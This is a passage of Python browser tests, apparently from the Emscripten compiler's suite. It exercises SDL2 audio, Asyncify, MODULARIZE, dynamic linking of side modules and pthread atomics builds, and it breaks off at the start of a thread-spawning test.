def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2'])
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2', '-sMAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-sUSE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-sEXIT_RUNTIME', '-sUSE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-sUSE_SDL=2', '-sUSE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds/the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-sINITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
# TODO: need to source freepats.cfg and a midi file
# 'mod': (['mid'], 'MIX_INIT_MID', 'midi.mid'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-sUSE_SDL=2',
'-sUSE_SDL_MIXER=2',
'-sSDL2_MIXER_FORMATS=' + json.dumps(formats),
'-sINITIAL_MEMORY=33554432'
])
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(ports.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-sUSE_COCOS2D=3', '-sERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest_exit('browser/async.cpp', args=['-O' + str(opts), '-g2', '-sASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-sASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-sASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest_exit('browser/async.cpp', args=['-sASYNCIFY', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest_exit('browser/async_2.cpp', args=['-O3', '--pre-js', 'pre.js', '-sASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual.cpp', args=['-O' + str(opts), '-profiling', '-sASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual_2.cpp', args=['-O' + str(opts), '-sASSERTIONS', '-sSAFE_HEAP', '-profiling', '-sASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest_exit('browser/async_longjmp.cpp', args=args + ['-sASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_mainloop.cpp', args=['-O' + str(opts), '-sASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-sASSERTIONS', '-sDISABLE_EXCEPTION_CATCHING=0', '-profiling', '-sSAFE_HEAP', '-lSDL', '-sASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-sASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-sASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-sASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-sASYNCIFY_IMPORTS=[sync_tunnel, sync_tunnel_bool]'],), # noqa
'response': (['-sASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-sASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', 'sync_tunnel\nsync_tunnel_bool\n')
self.btest('browser/async_returnvalue.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser/async_returnvalue.js')] + args + ['-sASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-sASYNCIFY', '-sASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sMODULARIZE as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sMODULARIZE', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sEXPORT_NAME=Foo as well.
def test_minimal_runtime_export_name(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sEXPORT_NAME=Foo', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-sEXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-sEXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-sEXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-sMODULARIZE', '-sSINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message);
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?Aborted(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser/test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
self.set_setting('EXIT_RUNTIME')
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-sWASM=0', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts, reporting=Reporting.JS_ONLY)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?exit:0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(Path('webidl/test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('main.c', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
return 0;
}
''')
create_file('side.c', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', 'side.wasm'])
print('wasm in worker (we can read binary data synchronously there)')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '--proxy-to-worker', 'side.wasm'])
print('wasm (will auto-preload since no sync binary reading)')
# same wasm side module works
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sEXPORT_ALL', 'side.wasm'])
def test_dlopen_async(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE'])
self.btest_exit(test_file('other/test_dlopen_async.c'), args=['-sMAIN_MODULE=2'])
def test_dlopen_blocking(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE', '-sUSE_PTHREADS', '-Wno-experimental'])
# Attempt to use dlopen the side module (without preloading) should fail on the main thread
# since the syncronous `readBinary` function does not exist.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), assert_returncode=1, args=['-sMAIN_MODULE=2'])
# But with PROXY_TO_PTHEAD it does work, since we can do blocking and sync XHR in a worker.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), args=['-sMAIN_MODULE=2', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-Wno-experimental'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output, emcc_args=[]):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'] + emcc_args)
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('main.c', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
return 0;
}
''')
create_file('side.c', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sLEGACY_GL_EMULATION', '-lSDL', '-lGL', 'side.wasm'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('main.c', r'''
#include <assert.h>
int side1();
int side2();
int main() {
assert(side1() == 1);
assert(side2() == 2);
return 0;
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# reffer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <cassert>
#include <thread>
#include <emscripten/emscripten.h>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
assert(side1_ptr == &side1);
assert(side2_ptr == &side2);
emscripten_force_exit(0);
}).detach();
emscripten_exit_with_live_runtime();
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.cpp'),
args=['-Wno-experimental', '-pthread', '-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-sASSERTIONS', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=16MB', '-sTOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', read_file(path_from_root('src/shell_minimal.html')).replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-gsource-map', '-std=gnu11', '-xc', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread/test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=3', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=2', '-sPTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=1', '-sPTHREAD_POOL_SIZE_STRICT=2', '-DSMALL_POOL'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest_exit(test_file('pthread/test_pthread_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_64bit_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_64bit_cxx11_atomics(self, opt):
for pthreads in [[], ['-sUSE_PTHREADS']]:
self.btest_exit(test_file('pthread/test_pthread_64bit_cxx11_atomics.cpp'), args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest_exit(test_file('pthread/test_pthread_hardware_concurrency.cpp'), args=['-O2', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread/main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sPROXY_TO_PTHREAD', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_fetch_and_op.cpp'), args=args + ['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed', '--profiling-funcs']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-O2', '-sPTHREAD_POOL_SIZE=8'])
# Tests the rest of the remaining GCC atomics after the two above tests.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_gcc_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest_exit(test_file('pthread/test_pthread_gcc_spinlock.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest_exit(test_file('pthread/test_pthread_create.cpp'),
args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-sMINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest_exit(test_file('pthread/test_pthread_preallocates_workers.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest_exit(test_file('pthread/test_large_pthread_allocation.cpp'), args=['-sINITIAL_MEMORY=128MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -sPROXY_TO_PTHREAD option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest_exit(test_file('pthread/test_pthread_proxy_to_pthread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_nested_spawns.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest_exit(test_file('pthread/test_pthread_join.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest_exit(test_file('pthread/test_std_thread_detach.cpp'), args=['-sUSE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest_exit(test_file('pthread/test_pthread_cancel.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread/test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-sUSE_PTHREADS=1', '-sPTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest_exit(test_file('pthread/test_pthread_kill.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest_exit(test_file('pthread/test_pthread_cleanup.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest_exit(test_file('pthread/test_pthread_mutex.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest_exit(test_file('pthread/test_pthread_attr_getstack.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest_exit(test_file('pthread/test_pthread_malloc.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest_exit(test_file('pthread/test_pthread_malloc_free.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sINITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest_exit(test_file('pthread/test_pthread_barrier.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest_exit(test_file('pthread/test_pthread_once.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
